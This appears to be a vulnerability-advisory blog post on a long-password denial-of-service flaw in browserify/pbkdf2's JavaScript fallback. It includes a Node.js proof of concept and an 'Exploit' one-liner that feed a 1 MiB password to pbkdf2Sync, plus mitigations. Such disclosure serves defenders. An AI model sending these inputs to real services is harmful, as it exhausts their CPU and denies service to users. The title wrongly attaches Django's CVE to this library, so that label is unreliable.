browserify/pbkdf2, Long Password DoS, CVE-2013-1443 (Medium) -DC-Oct2026-2738

Listen to this Post

CVE-2013-1443 is the Django long-password denial-of-service bug.

browserify/pbkdf2 has the same class of flaw in its JavaScript fallback.
PBKDF2 derives keys by iterating an HMAC construction many times.
HMAC hashes keys longer than the hash block size before use.

For SHA-256, the block size is 64 bytes.

The HMAC specification requires pre-hashing keys larger than 64 bytes.
Without pre-hashing, every PBKDF2 iteration processes the full password.
A long password therefore multiplies CPU work per iteration.
In browserify/pbkdf2, lib/sync.js line 60 hashes the full password each iteration.

This defeats the expected HMAC key-length handling.

The native code path may avoid this cost.

The JavaScript fallback is used when the native if statement is false.

The fallback is in /lib/sync.js.

The condition is in index.js lines 33 through 37.
An attacker can supply a password of 1 MiB or more.

The PoC creates a password with “.”.repeat(1048576).

It calls pbkdf2Sync with 1000 iterations and SHA-256.

It then pre-hashes the password with createHash(‘sha256’).update(pw).digest().

It calls pbkdf2Sync again with the 32-byte digest.

The first call takes much longer than the second.
The first call does not follow HMAC pre-hashing for long keys.

The second call follows the HMAC specification.

The generated keys should match if the algorithm is correct.

The performance gap demonstrates the DoS vector.

Repeated requests with long passwords can exhaust CPU.

The impact is denial of service.

Django fixed the same issue in CVE-2013-1443.

browserify/pbkdf2 issue 82 tracks the same problem.

The fix is to pre-hash long passwords, cache HMAC state, or limit length.
This is a real example of a PBKDF2 implementation pitfall.

DailyCVE Form:

Platform: browserify/pbkdf2
Version: Unspecified affected versions
Vulnerability : Long password DoS
Severity: Medium
date: Unknown publication date

Prediction: Unknown patch date

(end of form)

What Undercode Say:

Analytics:

npm install pbkdf2 create-hash
node poc.js
var pbkdf2 = require('pbkdf2');
var createHash = require('create-hash');
var pw = ".".repeat(1048576); // 1 MiB
var t0 = performance.now();
var key1 = pbkdf2.pbkdf2Sync(pw, "salt", 1000, 32, "sha256");
var t1 = performance.now();
pw = createHash('sha256').update(pw).digest(); // HMAC specification for keys larger than block size
var key2 = pbkdf2.pbkdf2Sync(pw, "salt", 1000, 32, "sha256");
var t2 = performance.now();
console.log("First took: " + (t1 - t0));
console.log("Second took: " + (t2 - t1));
console.log("Generated keys:");
console.log(key1);
console.log(key2);

Exploit: (Educational Purposes!)

node -e "var pbkdf2=require('pbkdf2'); var pw='.'.repeat(1048576); console.time('pbkdf2'); pbkdf2.pbkdf2Sync(pw,'salt',1000,32,'sha256'); console.timeEnd('pbkdf2');"

Protection: from this CVE

  • Pre-hash long passwords.
  • Enforce password length limits.
  • Use native PBKDF2.
  • Upgrade browserify/pbkdf2.

Impact:

DoS

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top